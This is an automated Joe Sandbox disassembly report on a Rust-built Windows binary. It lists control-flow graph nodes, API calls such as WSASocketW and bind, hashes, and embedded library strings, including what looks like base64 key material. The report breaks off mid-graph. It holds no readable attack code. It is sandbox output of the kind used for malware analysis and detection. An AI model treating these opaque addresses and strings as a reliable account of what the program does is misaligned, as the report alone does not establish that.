122127 7ff71a850ce6 122125->122127 122126->122122 122126->122123 122127->122126 122129 7ff71a850b01 122127->122129 122130 7ff71a850b18 122129->122130 122131 7ff71a850a22 RtlAllocateHeap 122130->122131 122132 7ff71a850b1f 122130->122132 122131->122132 122132->122126 122134 7ff71a7d751e 38 API calls 122133->122134 122135 7ff71a807953 122134->122135 122135->122059 122137 7ff71a850e03 122136->122137 122139 7ff71a7d7539 122136->122139 122138 7ff71a850a22 RtlAllocateHeap 122137->122138 122137->122139 122138->122139 122139->122098 122139->122099 122140->122102 122142 7ff71a822af0 122141->122142 122145 7ff71a822a6b TlsGetValue 122141->122145 122156 7ff71a822c00 37 API calls 122142->122156 122146 7ff71a822a7a 122145->122146 122151 7ff71a822abd 122145->122151 122147 7ff71a846080 RtlAllocateHeap 122146->122147 122146->122151 122148 7ff71a822a8f 122147->122148 122149 7ff71a822a94 TlsGetValue TlsSetValue 122148->122149 122150 7ff71a822b03 122148->122150 122149->122151 122152 7ff71a7a8ce0 34 API calls 122150->122152 122151->122038 122153 7ff71a822b12 122152->122153 122154->122041 122156->122145
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: Flatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/future/flatten.rs$Map must not be polled after it returned `Poll::Ready`$authority implies host$called `Result::unwrap()` on an `Err` value$domain is valid Uri$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$internal error: entered unreachable codemid > len$size overflows MAX_SIZE$uri host is valid header value
                • API String ID: 3510742995-1581683678
                • Opcode ID: f03ed357ce18c32f086c103f06d86097b394d98cdb5d9add489c4e85fabd8cca
                • Instruction ID: 2655203a48233ae4490df6ba44ef4046d946e32f034d6256ac61e80b5166a04b
                • Opcode Fuzzy Hash: f03ed357ce18c32f086c103f06d86097b394d98cdb5d9add489c4e85fabd8cca
                • Instruction Fuzzy Hash: EB339D62A08FD285FB61EB14E0447EAA764FB85798F844076DE8D03786EF3CE259C750
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: */*$:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$base64 is always valid HeaderValue/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/reqwest-0.11.25/src/util.rs$called `Result::unwrap()` on an `Err` value$core thread panicked$has_authority means set_password shouldn't fail$has_authority means set_username shouldn't fail$jT6cTLcUEB72GzKjkLp3d0RXNI6z5wwWh26ml9rrXe0=:W2QxQTByRbJ/reSL:\/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/aes-0.8.4/src/soft/fixslice64.rs$reqwest-internal-sync-runtime$size overflows MAX_SIZE$tx only taken on error
                • API String ID: 3510742995-1693400321
                • Opcode ID: f237b5228748963b809a59ce3c68717bfe257837488a1891ab17c70db7d24fe5
                • Instruction ID: b64d15e7e5653de045892f610cabf4579ceac4e550524d400c6e19254c816b81
                • Opcode Fuzzy Hash: f237b5228748963b809a59ce3c68717bfe257837488a1891ab17c70db7d24fe5
                • Instruction Fuzzy Hash: E0638222A09FC191F721AF25E4413EAE360FB99B94F848272DA8D17756DF3CE259C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$memset
                • String ID: Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codemid > len$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state:
                • API String ID: 438689982-623776711
                • Opcode ID: 8fd7d093e15a1f6463ed582f2c8422aa5f76f96840f409de9d45fc99a931067a
                • Instruction ID: d2e7d6479f766573bbc3712f61ace104c7dd1ad37ee724008dbd1661e585ef85
                • Opcode Fuzzy Hash: 8fd7d093e15a1f6463ed582f2c8422aa5f76f96840f409de9d45fc99a931067a
                • Instruction Fuzzy Hash: 6D335E62A0CBC285E671AF14E0453EEE3A0FB98754F844162DACC53B5ADF3CD699CB10
                APIs
                Strings
                • assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs, xrefs: 00007FF71A80DA3E, 00007FF71A80DA9E
                • httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A80DC23
                • invalid maximum TLS version for backendvalid request parts, xrefs: 00007FF71A80CBE5
                • size overflows MAX_SIZE, xrefs: 00007FF71A80EB49
                • NO_PROXYno_proxy, xrefs: 00007FF71A80C351
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: NO_PROXYno_proxy$assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs$httphttpswswssfile:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$invalid maximum TLS version for backendvalid request parts$size overflows MAX_SIZE
                • API String ID: 3510742995-1717467724
                • Opcode ID: 592d1e0028f5690b7abf567fcf70265c776644248edb0080bc933f1d978cd826
                • Instruction ID: d004bc87d1bb627ec90d0c53caaa6bb66675cea5bd5d044da35d73014a51ac02
                • Opcode Fuzzy Hash: 592d1e0028f5690b7abf567fcf70265c776644248edb0080bc933f1d978cd826
                • Instruction Fuzzy Hash: D8E27872A08FC181E762AB14E4443EEB7A4FB88794F844176DA8D17B99DF3CD299C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 2764 7ff71a7f0c67-7ff71a7f0ca5 call 7ff71a859f80 2767 7ff71a7f0cca-7ff71a7f0d65 2764->2767 2768 7ff71a7f0ca7-7ff71a7f0cc3 2764->2768 2769 7ff71a7f0d6d-7ff71a7f0d92 2767->2769 2768->2767 2770 7ff71a7f1c1b-7ff71a7f1c1f 2769->2770 2771 7ff71a7f0d98-7ff71a7f0d9b 2769->2771 2772 7ff71a7f1c25-7ff71a7f1c29 2770->2772 2773 7ff71a7f75fc-7ff71a7f760a 2770->2773 2774 7ff71a7f75d4-7ff71a7f75e7 call 7ff71a851634 2771->2774 2775 7ff71a7f0da1-7ff71a7f0db4 2771->2775 2776 7ff71a7f1db1-7ff71a7f7505 call 7ff71a7f7cfa 2772->2776 2777 7ff71a7f1c2f-7ff71a7f1c45 2772->2777 2779 7ff71a7f7614-7ff71a7f76ba call 7ff71a7aef50 call 7ff71a7b1d80 * 2 call 7ff71a7a8ce0 call 7ff71a7ac510 * 2 call 7ff71a7a8c80 2773->2779 2780 7ff71a7f760f call 7ff71a851634 2773->2780 2782 7ff71a7f75ec-7ff71a7f75fa 2774->2782 2775->2774 2781 7ff71a7f0dba-7ff71a7f0dd5 2775->2781 2802 7ff71a7f7510-7ff71a7f7553 call 7ff71a7f04f2 2776->2802 2803 7ff71a7f7507-7ff71a7f750b 2776->2803 2786 7ff71a7f1d6d-7ff71a7f1d79 2777->2786 2885 7ff71a7f76c1-7ff71a7f77ce call 7ff71a7ade90 call 7ff71a7b1d80 call 7ff71a7d973a call 7ff71a7b1d80 2779->2885 2780->2779 2785 7ff71a7f0ddd-7ff71a7f0df1 2781->2785 2787 7ff71a7f75ca-7ff71a7f75cf call 7ff71a7ac510 2782->2787 2790 7ff71a7f1623-7ff71a7f1627 2785->2790 2791 7ff71a7f0df7-7ff71a7f0e50 memcpy 2785->2791 2793 7ff71a7f7590-7ff71a7f75ab 2786->2793 2787->2774 2796 7ff71a7f162d-7ff71a7f165d call 7ff71a7e54df 2790->2796 2797 7ff71a7f75ac-7ff71a7f75ba 2790->2797 2798 7ff71a7f0e56-7ff71a7f0ebd 2791->2798 2799 7ff71a7f75bc-7ff71a7f75c3 2791->2799 2796->2786 2811 7ff71a7f1663-7ff71a7f16a0 2796->2811 2797->2787 2800 7ff71a7f0ec3-7ff71a7f0ec7 2798->2800 2801 7ff71a7f14b9-7ff71a7f1538 call 7ff71a7da9f8 call 7ff71a7d542d memcpy 2798->2801 2799->2787 2805 7ff71a7f0ed1-7ff71a7f0ef9 call 7ff71a7daa9b call 7ff71a7cde69 2800->2805 2806 7ff71a7f0ec9-7ff71a7f0ecc 2800->2806 2831 7ff71a7f15e7-7ff71a7f161e call 7ff71a7da645 call 7ff71a7da6bc 2801->2831 2817 7ff71a7f755a-7ff71a7f758d 2802->2817 2803->2793 2834 7ff71a7f0eff-7ff71a7f0f40 2805->2834 2835 7ff71a7f1008-7ff71a7f1025 call 7ff71a7aecd0 2805->2835 2812 7ff71a7f137f-7ff71a7f13a3 2806->2812 2811->2782 2818 7ff71a7f16a6-7ff71a7f16bf call 7ff71a7da645 2811->2818 2829 7ff71a7f1483-7ff71a7f148f 2812->2829 2830 7ff71a7f13a9-7ff71a7f147c call 7ff71a7dab88 2812->2830 2817->2793 2836 7ff71a7f16c1-7ff71a7f16eb call 7ff71a7c8491 call 7ff71a7d5b83 2818->2836 2837 7ff71a7f16ed-7ff71a7f170b 2818->2837 2840 7ff71a7f1497-7ff71a7f14a6 call 7ff71a7daf00 2829->2840 2830->2840 2870 7ff71a7f147e-7ff71a7f15e0 call 7ff71a7da9f8 call 7ff71a7d542d memcpy 2830->2870 2831->2785 2842 7ff71a7f0f49-7ff71a7f0f67 call 7ff71a851aa9 2834->2842 2859 7ff71a7f10f6-7ff71a7f111e 2835->2859 2860 7ff71a7f102b-7ff71a7f102f 2835->2860 2847 7ff71a7f170d-7ff71a7f1762 2836->2847 2837->2847 2866 7ff71a7f0fa0-7ff71a7f0fa3 2842->2866 2867 7ff71a7f0f69-7ff71a7f0f86 call 7ff71a7e5a6e 2842->2867 2847->2782 2855 7ff71a7f1768-7ff71a7f17b8 memcpy call 7ff71a7f0604 memcpy 2847->2855 2879 7ff71a7f1d7e-7ff71a7f1dac call 7ff71a7f060e call 7ff71a7f04f2 2855->2879 2880 7ff71a7f17be-7ff71a7f17f4 memcpy call 7ff71a7e11e7 2855->2880 2872 7ff71a7f1123-7ff71a7f112a 2859->2872 2868 7ff71a7f1037-7ff71a7f103e 2860->2868 2877 7ff71a7f0fa5-7ff71a7f0fc3 call 7ff71a7e53ff 2866->2877 2867->2842 2898 7ff71a7f0f88-7ff71a7f0f9e 2867->2898 2875 7ff71a7f1363-7ff71a7f137a 2868->2875 2876 7ff71a7f1044-7ff71a7f1054 call 7ff71a7daacb 2868->2876 2870->2831 2872->2875 2881 7ff71a7f1130-7ff71a7f1137 2872->2881 2875->2812 2876->2875 2909 7ff71a7f105a-7ff71a7f1085 call 7ff71a851b7d call 7ff71a7daae1 2876->2909 2911 7ff71a7f0fc5-7ff71a7f0fe2 call 7ff71a7e5a6e 2877->2911 2912 7ff71a7f0ffd-7ff71a7f1003 2877->2912 2879->2817 2890 7ff71a7f17f7-7ff71a7f1802 2880->2890 2883 7ff71a7f1170-7ff71a7f11b2 2881->2883 2884 7ff71a7f1139-7ff71a7f113e 2881->2884 2894 7ff71a7f12b5-7ff71a7f12b8 2883->2894 2895 7ff71a7f11b8-7ff71a7f11bb 2883->2895 2892 7ff71a7f1144-7ff71a7f1147 2884->2892 2893 7ff71a7f135a-7ff71a7f135e 2884->2893 2901 7ff71a7f18d2-7ff71a7f1953 2890->2901 2902 7ff71a7f1808-7ff71a7f1822 2890->2902 2904 7ff71a7f1353-7ff71a7f1358 2892->2904 2905 7ff71a7f114d-7ff71a7f1165 2892->2905 2893->2872 2894->2893 2910 7ff71a7f12be-7ff71a7f1311 call 7ff71a7d175a 2894->2910 2895->2893 2906 7ff71a7f11c1-7ff71a7f1246 call 7ff71a7d1633 2895->2906 2898->2877 2920 7ff71a7f1955-7ff71a7f198e 2901->2920 2921 7ff71a7f199b-7ff71a7f19a5 2901->2921 2902->2901 2938 7ff71a7f1828-7ff71a7f1835 2902->2938 2904->2875 2904->2893 2905->2893 2914 7ff71a7f116b 2905->2914 2906->2893 2939 7ff71a7f124c-7ff71a7f12b0 call 7ff71a7d1633 2906->2939 2909->2875 2950 7ff71a7f108b-7ff71a7f109e call 7ff71a7cdf83 2909->2950 2910->2893 2933 7ff71a7f1313-7ff71a7f1343 call 7ff71a7d175a 2910->2933 2911->2877 2935 7ff71a7f0fe4-7ff71a7f0ffa 2911->2935 2912->2835 2914->2875 2923 7ff71a7f1994-7ff71a7f1996 2920->2923 2924 7ff71a7f1ad2-7ff71a7f1ada 2920->2924 2926 7ff71a7f19cb-7ff71a7f1a30 call 7ff71a7f77d3 call 7ff71a7f0656 2921->2926 2927 7ff71a7f19a7-7ff71a7f19c6 2921->2927 2934 7ff71a7f1add-7ff71a7f1bbd memcpy call 7ff71a7d542d memcpy 2923->2934 2924->2934 2966 7ff71a7f1a92-7ff71a7f1ab2 2926->2966 2967 7ff71a7f1a32-7ff71a7f1a8d call 7ff71a7c84ed call 7ff71a7c8355 call 7ff71a7d5b8e call 7ff71a7e543f call 7ff71a7f064b call 7ff71a84962b * 2 2926->2967 2936 7ff71a7f1aba-7ff71a7f1aca 2927->2936 2951 7ff71a7f1348-7ff71a7f134f 2933->2951 2964 7ff71a7f1bbf-7ff71a7f1c16 call 7ff71a7f04f2 2934->2964 2935->2912 2936->2924 2944 7ff71a7f1879-7ff71a7f18b1 call 7ff71a7d542d call 7ff71a7d9c0e 2938->2944 2945 7ff71a7f1837-7ff71a7f1877 call 7ff71a7d542d 2938->2945 2939->2951 2968 7ff71a7f18b8-7ff71a7f18ca 2944->2968 2945->2968 2972 7ff71a7f10a0-7ff71a7f10b3 call 7ff71a7cde69 2950->2972 2973 7ff71a7f10cc-7ff71a7f10e3 call 7ff71a7daacb 2950->2973 2951->2893 2959 7ff71a7f1351 2951->2959 2959->2875 2964->2769 2966->2936 2967->2964 2968->2901 2972->2875 2983 7ff71a7f10b9-7ff71a7f10bf 2972->2983 2973->2875 2984 7ff71a7f10e9-7ff71a7f10f1 2973->2984 2983->2984 2986 7ff71a7f10c1-7ff71a7f10c5 2983->2986 2984->2868 2986->2984 2988 7ff71a7f10c7 2986->2988 2988->2875
                APIs
                Strings
                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7F76B3, 00007FF71A7F77C0
                • Map must not be polled after it returned `Poll::Ready`, xrefs: 00007FF71A7F75D4
                • ALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs, xrefs: 00007FF71A7F1A43
                • TryFlatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/try_future/try_flatten.rs, xrefs: 00007FF71A7F75FC
                • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs, xrefs: 00007FF71A7F7649
                • internal error: entered unreachable codemid > len, xrefs: 00007FF71A7F75AC, 00007FF71A7F75BC, 00007FF71A7F75EC
                • assertion failed: max <= std::u32::MAX as usize, xrefs: 00007FF71A7F7661
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: ALPN upgraded to HTTP/2/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/hyper-0.14.28/src/client/client.rs$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/futures-util-0.3.30/src/future/try_future/try_flatten.rs$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs$assertion failed: max <= std::u32::MAX as usize$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codemid > len
                • API String ID: 3510742995-2226513332
                • Opcode ID: 6faba8f46417a4395515b9ba51f3191f7d1e9a5c550a9044d37e57159c5e36a2
                • Instruction ID: 011c6c14fe26f0a37c21a310667ca60d36e5e069e53b50b5f871ac96aefc2edd
                • Opcode Fuzzy Hash: 6faba8f46417a4395515b9ba51f3191f7d1e9a5c550a9044d37e57159c5e36a2
                • Instruction Fuzzy Hash: CC927E62A08FC285EB719F14E4503EAA361FB897A4F844176DA9C43B99DF3CD259CB10

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3000 7ff71a820507-7ff71a820523 3001 7ff71a820529-7ff71a82054c call 7ff71a7ae460 3000->3001 3002 7ff71a820992-7ff71a820999 call 7ff71a7aef50 3000->3002 3007 7ff71a820552-7ff71a82055a 3001->3007 3008 7ff71a8205e5-7ff71a8205e7 3001->3008 3006 7ff71a82099e-7ff71a8209ad call 7ff71a7a8ce0 3002->3006 3011 7ff71a8205e0 3007->3011 3012 7ff71a820560-7ff71a820569 3007->3012 3010 7ff71a8205e9-7ff71a8205f0 3008->3010 3014 7ff71a820609-7ff71a82060f 3010->3014 3015 7ff71a8205f2-7ff71a8205f7 3010->3015 3011->3008 3012->3011 3016 7ff71a82056b-7ff71a820571 3012->3016 3018 7ff71a820615-7ff71a82063f 3014->3018 3019 7ff71a8206b1-7ff71a8206c6 call 7ff71a846080 3014->3019 3017 7ff71a8205f9-7ff71a820607 3015->3017 3015->3018 3016->3011 3020 7ff71a820573-7ff71a82058b 3016->3020 3017->3018 3022 7ff71a820644-7ff71a820655 call 7ff71a7b0ea0 3018->3022 3019->3006 3029 7ff71a8206cc-7ff71a820712 3019->3029 3023 7ff71a82058d-7ff71a820599 3020->3023 3034 7ff71a820657-7ff71a82065e 3022->3034 3035 7ff71a82066b 3022->3035 3026 7ff71a8205b8-7ff71a8205be 3023->3026 3027 7ff71a82059b-7ff71a82059e 3023->3027 3028 7ff71a8205c1-7ff71a8205c9 3026->3028 3027->3011 3031 7ff71a8205a0-7ff71a8205a5 3027->3031 3028->3011 3032 7ff71a8205cb-7ff71a8205de 3028->3032 3033 7ff71a820717-7ff71a82073f 3029->3033 3031->3011 3036 7ff71a8205a7-7ff71a8205b2 3031->3036 3032->3010 3038 7ff71a820741-7ff71a82074b 3033->3038 3039 7ff71a820660-7ff71a820663 3034->3039 3040 7ff71a820665-7ff71a820669 3034->3040 3037 7ff71a820672-7ff71a82068b call 7ff71a7d2345 3035->3037 3036->3023 3041 7ff71a8205b4-7ff71a8205b6 3036->3041 3043 7ff71a8208e0-7ff71a8208f4 call 7ff71a820493 3038->3043 3044 7ff71a820751-7ff71a820761 3038->3044 3039->3040 3045 7ff71a82068c-7ff71a8206a2 call 7ff71a7b1a90 3039->3045 3040->3022 3040->3035 3041->3028 3058 7ff71a8208fd-7ff71a820927 call 7ff71a8452d0 3043->3058 3044->3043 3049 7ff71a820767-7ff71a82078f 3044->3049 3057 7ff71a8206a8-7ff71a8206af 3045->3057 3045->3058 3050 7ff71a8208d6-7ff71a8208db call 7ff71a845850 3049->3050 3051 7ff71a820795-7ff71a82079e 3049->3051 3050->3043 3054 7ff71a8207a0 3051->3054 3055 7ff71a8207a5-7ff71a8207cb WSASocketW 3051->3055 3054->3055 3059 7ff71a8207cd-7ff71a8207d1 3055->3059 3060 7ff71a8207e4-7ff71a8207ee WSAGetLastError 3055->3060 3057->3037 3058->3037 3072 7ff71a82092d-7ff71a820955 call 7ff71a8454f0 3058->3072 3063 7ff71a8207d3-7ff71a8207e2 3059->3063 3064 7ff71a820845-7ff71a820859 3059->3064 3065 7ff71a8207fe-7ff71a820821 WSASocketW 3060->3065 3066 7ff71a8207f0-7ff71a8207f8 3060->3066 3068 7ff71a82085d-7ff71a82089e bind 3063->3068 3064->3068 3070 7ff71a820827-7ff71a82083c SetHandleInformation 3065->3070 3071 7ff71a8208cc-7ff71a8208d4 WSAGetLastError 3065->3071 3066->3065 3069 7ff71a8208b4-7ff71a8208c7 call 7ff71a82049f 3066->3069 3074 7ff71a8208a4 WSAGetLastError 3068->3074 3075 7ff71a820965-7ff71a82098b call 7ff71a820493 call 7ff71a82049f 3068->3075 3069->3038 3070->3059 3073 7ff71a82083e-7ff71a820843 GetLastError 3070->3073 3071->3069 3072->3033 3082 7ff71a82095b-7ff71a820960 3072->3082 3080 7ff71a8208a9-7ff71a8208af closesocket 3073->3080 3074->3080 3075->3002 3080->3069 3082->3037
                APIs
                Strings
                • 127.0.0.1:34254/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF71A820529
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLast$Socket$HandleInformationbindclosesocket
                • String ID: 127.0.0.1:34254/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\collections\btree\navigate.rs
                • API String ID: 891237031-2351542260
                • Opcode ID: b24ef55e186e51373e15fac5668b013096d265170a54ff17c74f2cb343f6e08f
                • Instruction ID: d5a6d468142416f4a3abf885ca07d13313aec7129c4b0166ccafc5c48b9002b6
                • Opcode Fuzzy Hash: b24ef55e186e51373e15fac5668b013096d265170a54ff17c74f2cb343f6e08f
                • Instruction Fuzzy Hash: B5C1C922A1CB4241F752AB14E44137AE6A1EB817B4F805173EE9D47BD5DF3CD8AAC720
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$memcmp
                • String ID: HTTP/1.$PRI * HTTP/2.0SM$close$just sent Ok$size overflows MAX_SIZE
                • API String ID: 3384217055-2780495454
                • Opcode ID: 99ff54ec46451ba3aa82f48be39aa608694a3a40cf7f87c3aefafc58550e317a
                • Instruction ID: 253e8606bc645fd3c6435ac7d4a7cfa57f97f5a44b67d92a5cf88545c416461d
                • Opcode Fuzzy Hash: 99ff54ec46451ba3aa82f48be39aa608694a3a40cf7f87c3aefafc58550e317a
                • Instruction Fuzzy Hash: 40339262A0CAC281F671AF14E0403FEA7A1FB997A4F844172DA8D57699DF3CD64DC710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3877 7ff71a80e2ce-7ff71a80e2f0 call 7ff71a7dab88 3880 7ff71a80e367 3877->3880 3881 7ff71a80e2f2-7ff71a80e334 call 7ff71a815873 call 7ff71a7da89c 3877->3881 3882 7ff71a80e36f-7ff71a80e377 3880->3882 3881->3880 3881->3882 3884 7ff71a80e3d7-7ff71a80e452 call 7ff71a7c5402 call 7ff71a810cc3 call 7ff71a7b5c0a call 7ff71a810d7b 3882->3884 3885 7ff71a80e379-7ff71a80e3d2 call 7ff71a7ca149 call 7ff71a7da73e 3882->3885 3900 7ff71a80e47a-7ff71a80e53f memcpy call 7ff71a810eb4 call 7ff71a810f2b call 7ff71a810f70 call 7ff71a7d59c1 3884->3900 3901 7ff71a80e454-7ff71a80e475 memcpy 3884->3901 3885->3884 3909 7ff71a80e544-7ff71a80e573 memcpy call 7ff71a81125f 3900->3909 3901->3900 3911 7ff71a80e578-7ff71a80e596 3909->3911 3912 7ff71a80e598 3911->3912 3913 7ff71a80e59f-7ff71a80e5aa 3911->3913 3912->3913 3914 7ff71a80e61b-7ff71a80e637 3913->3914 3915 7ff71a80e5ac-7ff71a80e5c2 3913->3915 3918 7ff71a80e63d-7ff71a80e6b0 3914->3918 3919 7ff71a80eb8f 3914->3919 3916 7ff71a80e5cb-7ff71a80e5ee call 7ff71a850505 3915->3916 3917 7ff71a80e5c4 3915->3917 3916->3914 3925 7ff71a80e5f0-7ff71a80e618 call 7ff71a7d542d 3916->3925 3917->3916 3922 7ff71a80e6b5-7ff71a80e7e5 memcpy call 7ff71a84ada3 3918->3922 3920 7ff71a80eb91-7ff71a80eb98 3919->3920 3927 7ff71a80eb6a-7ff71a80eb77 call 7ff71a80eb9a 3922->3927 3928 7ff71a80e7eb-7ff71a80e92e call 7ff71a84e873 memcpy 3922->3928 3925->3914 3937 7ff71a80eb79-7ff71a80eb83 3927->3937 3935 7ff71a80eaec-7ff71a80eaf9 call 7ff71a80eb9a 3928->3935 3936 7ff71a80e934-7ff71a80e943 3928->3936 3943 7ff71a80eafc-7ff71a80eb02 3935->3943 3936->3919 3938 7ff71a80e949-7ff71a80eadd call 7ff71a7d542d memcpy call 7ff71a7d9744 3936->3938 3937->3919 3939 7ff71a80eb8a call 7ff71a7d973a 3937->3939 3938->3943 3952 7ff71a80eadf-7ff71a80eaea call 7ff71a84fc3d 3938->3952 3939->3919 3946 7ff71a80eb04-7ff71a80eb14 3943->3946 3947 7ff71a80eb66-7ff71a80eb68 3943->3947 3949 7ff71a80eb21-7ff71a80eb26 call 7ff71a7d5699 3946->3949 3950 7ff71a80eb16-7ff71a80eb1b 3946->3950 3947->3937 3959 